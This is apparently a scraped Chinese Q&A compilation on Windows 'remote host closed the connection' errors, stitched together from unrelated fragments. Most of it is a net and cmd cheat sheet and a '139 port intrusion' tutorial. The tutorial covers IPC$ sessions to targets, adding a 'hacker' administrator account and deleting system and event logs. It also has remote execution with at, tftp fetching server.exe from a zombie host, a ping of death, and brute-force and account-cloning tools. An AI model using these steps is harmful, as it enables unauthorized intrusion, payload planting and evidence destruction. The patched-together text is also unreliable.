在"控制面板"中雙擊"添加或刪除程序",...
1
在彈出的"Windows組件向導"中選擇"網路...
2
勾選"Internet驗證服務"子組件,確定,...
3
在"控制面板"下的"管理工具"中打開"Int...
4
創建用戶賬戶.在"控制面板"下的"管理工...
5
為了方便管理,我們創建一個用戶組"802...
6
在添加用戶之前,必須要提前做的是,打...
7
否則以後認證的時候將會出現以下錯誤提
2、遠程主機強制關閉了一個現有鏈接,怎麼解決?
您所處的狀態是不是使用了公共wifi 建議您開啟自己的wifi熱點 這樣信件就能收取成功
3、遠程主機強迫關閉了一個現有的連接是什麼意思
症狀和問題:
在達到某連接數後,新建立的連接會直接斷開,錯誤提示如下兩條:
"無法將數據寫入傳輸連接: 遠程主機強迫關閉了一個現有的連接。。"
"無法從傳輸連接中讀取數據: 遠程主機強迫關閉了一個現有的連接。。"
之前建立的連接正常收發包。
錯誤代碼定位到:System.Net.Sockets.TcpListener類下的EndAcceptTcpClient()方法。
補充描述:
模擬終端和服務端同時提示以上錯誤,應該不是模擬終端問題。
之前覺得百兆交換機影響,年前換成了千兆的,卻沒什麼大的提升;
伺服器硬體應該是千兆網卡,但win2003在VMware 虛擬機內,所以提示100Mbps,但使用率從沒超過1%還是0.1%。如圖
很詳細的啰嗦描述:
0、cpu/內存/線程數 都不高,比如某時刻值: CPU 13%,線程數51,內存859696k
1、如果不發數據包,只建立TCP連接,測試能到2W,甚至更大都沒有問題(沒有進行更大連接測試)。
2、收發數據包,到1W都正常,再增加模擬終端數量就報如上錯誤。
3、嘗試加長和縮短數據包大小,最大TCP連接數有反比變化,但很小。(不清楚交換機怎麼分包轉發的)
4、個人猜測,數據包在某個環節處理不過來引起的問題。但我程序任何資源的佔用都不高。所以一直懷疑是網路交換機。另外是否操作系統某些設置也影響,或者虛擬機也影響。
4、能ping通,但ftp連接不上,提示「遠程主機關閉連接」。ftp是在區域網中用serv-u建立的,大多數機器能連接。
能ping通,但ftp連接不上,提示「遠程主機關閉連接」。是設置錯誤造成的,解決方法如下:
1、首先登錄其中一台電腦,點擊左下的開始圖標。
2、然後在開始菜單中,找到並選擇「運行」,或用windows快捷組合鍵「win+r」。
3、打開運行窗口後,在「打開」欄上輸入「cmd」命令,並點擊「確定」。
4、打開cmd窗口,在裡面輸入ping 192.168.11.56後,按回車,就可以看到是否ping通了。如果返回下圖信息則是ping通了。
5、如果返以下信息,則說明ping不通另一台電腦。
5、有什麼辦法連接遠程主機。註:我有遠程主機的登陸賬號密碼,且遠程主機允許連接》
首先是、你必須要知道對方的IP地址,只有用戶名和密碼是不行的。
點 開始 -→附件-→通訊-→遠程桌面連接-→ 輸入IP地址-→(連接成功後會
出現windows的登陸窗)-→(輸入用戶名及密碼就可以了)
6、怎樣實現Telnet和遠程主機的連接?它受什麼限制?
要使用遠程登錄服務,必須在本地計算機上啟動一個客戶應用程序,指定遠程計算機的名字,並通過Internet與之建立連接.一旦連接成功,本地計算機就像通常的終端一樣,直接訪問遠程計算機系統的資源.遠程登錄軟體充許用戶直接與遠程計算機互交,通過鍵盤或滑鼠操作,客戶應用程序將有關的信息發送給遠程計算機,再有伺服器將輸出的結果返回給用戶.用戶退出遠程登錄後,用戶的鍵盤 顯示控制權又回到本地計算機.一般用戶可以通過Windows的Telnet客戶程序進行遠程登錄.
7、如何通過dos 命令連接遠程主機,連接後怎麼控制
常用的DOS命令建立到遠程主機的連接
net use \\ip\ipc$ "password"
/user:"username"
建立新用戶
net user username password /add
修改用戶密碼
net
user username newpassword
激活用戶
net user username
/active:yes
把用戶加入到用戶組
net localgroup groupname username
/add
查看遠程主機的時間
net time \\ip
顯示遠程主機的共享資源列表
net view
\\ip
啟動和停止系統服務
net start(stop) servicename
映射對方的硬碟
net use z:
\\ip\c$
啟動程序
at \\ip time programnane
文件復制
copy filename
\\ip\c$\filename
遠程執行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
刪除日誌
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
訪問對方共享資源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示連接成功,你在輸入
start \\192.168.1.1\c$
就打開目標機的C盤了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use
h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$
登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del
刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes
激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup
administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net
start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set
設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net
view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net
pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del
刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345
用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a
查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v
查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip
對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數
ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名)
向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t
以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名
加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR
*.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二:
del /S /Q 目錄
或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc
one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >"
是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at
id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠
遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet
將進入本機的telnet
copy 路徑\文件名1 路徑\文件名2 /y
復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
copy c:\srv.exe \\ip\admin$
復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.*
復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要復制的文件或目錄樹 目標地址\目錄名
復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe
c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe
參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put
c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠
用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route
print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway
addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp
-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem
查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir
查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、
time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set
指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元)
顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if
在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽
將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名
從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo
信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值
設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
139埠入侵
net
命令是139埠入侵的重中之重,整個入侵過程會多次用到它。在命令行窗口下輸入net,可以看到有一大堆參數,別被這一大堆參數嚇懷了,現在我來為你一一講解。
net
use
net use
命令用於與遠程主機建立IPC$(管理)連接,當你有遠程計算機的用戶名(通常用戶名為administrator,記住它)和密碼時,在命令行窗口下輸入net
use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠程計算機的連接。在這之後,可以對其進行管理了。net
use 還有一個用處,即映射遠程機器的共享資源,輸入net use z: \\IP\C$
(注意!在此之後的一切命令都是基於第一個命令的,也就是說必須先建立IPC$連接後,這些命令才會成功),打開「我的電腦」,你會發現多了一個Z盤,裡面全是遠程主機C盤下的東西,你在Z盤里刪除了一個文件,對方C盤下的這個文件就也被刪除了,所有對Z盤的操作其實就是對遠程計算機的C
盤的操作。怎麼樣,是不是很有意思呢?
net view
net view 用於查看遠程計算機有哪些共享資源,通常你會看到my
document之類的共享文件夾,輸入net view \\IP即可。我個人認為net view
沒有太大用處,要知道,在Windows2000中,各個硬碟都是共享的,但是如果你用net view 來查看,你會發現並無C,D,E
之類的共享資源。這是為什麼呢?注意,在這之前的一些命令中,我們曾輸入過IPC$,C$這樣的奇怪東西,其實,Windows2000中,帶"$"後綴的共享資源是隱藏的,在命令行窗口下是無法看到的,Windows2000中各個盤都是以諸如C$,D$,E$
這樣的名稱共享的,所以我們看不到,但確實存在,IPC$也是如此。
net share
net share 用於開放共享,輸入net
share QQ=c:\tencent,你會發現多了一個名為QQ的共享資源。這個命令有慎么作用呢?假設一個主機安全做的不錯,關閉了IPC$,C$,D$
等共享,那麼我們就無法在139埠上建立管理連接,也無法訪問對方的C盤,當我們通過別的手段進入後(如遠程溢出),我們就可以用net share
開放IPC$,從而轉為熟悉的139埠的入侵,開放IPC$ 的命令為net share IPC$。相應的,如果你想關閉共享,你可以加上/del 後綴,例如net
share c$ /del 就關閉了C盤的共享。
net user
net user 命令用於管理主機上的用戶,僅輸入不帶任何參數的net
user 會列出計算機上所有的用戶名。現在就讓我們看看net user
命令是如何對用戶進行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一個名為hacker,密碼為12345的用戶。
┃
┃ net user hacker /del
刪除名為hacker的用戶。 ┃
┃ net user hacker
/active:no 禁用hacker這個用戶,這個用戶不能再登陸此計算機。 ┃
┃ net user hacker
/active:yes 激活已禁用的hacker這個用戶。 ┃
┃ net localgroup
administrator hacker /add 把hacker這個用戶添加進管理員組,即提升hacker的許可權,使之變為管理員 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用於起動/停止系統服務,通常我們會net stop w3svc
(停止網頁服務),然後替換網頁,對此命令我不多講,知道即可。
*at 命令,net
time
之所以把它們放在一起來講,是因為at命令要用到net time命令的結果,一般我們先 net view
\\ip,得到遠程主機的時間(假設得到的時間為9:00),然後at \\ip 9:00 telnet
就啟動了telnet服務,at這個命令就是用來遠程運行程序的.
(5)需要准備的工具
肉雞獵手v1.0掃描一個網段,找出弱密碼的計算機
SMBCrack
針對特定主機,暴力猜解密碼
DameWare Mini Remote Control監控運程屏幕
CA.exe
克隆管理員賬號
8、怎麼啟動遠程主機的遠程桌面連接服務?
進入以下路徑:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server Wds\rdpwd\Tds\tcp 新建個PortNamber把值改成3389 就好了
但是這樣必須通過遠程操作注冊表.所以遠程主機必須開啟remote registry服務.
可以使用批處理sc config remoteregistry start= auto 來開啟它.
同時還需要添加或修改注冊表HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP\Tcp把PortNamber值改為3389如果沒有就建立
9、怎麼查有無別的遠程主機連接到本地計算機
首先打開控制面板>>管理工具>>
事件查看器
>>選擇安全性;
再點菜單欄中,查看>>篩選>>事件ID填528進行過濾,時間你看是多久,雙擊查看;
之後就可以找到登錄伺服器的ip了。
10、遠程主機怎麼關閉了一個現有的連接
1、網路提供商(電信、網通、……)出的問題
2、如果你自己接了路由器,這個路由器也是肇事者
3、電腦上程序的問題。防火牆,或者是病毒引起。
根據這些可能找找。如有不全,希望其他人能指出,以幫助解決。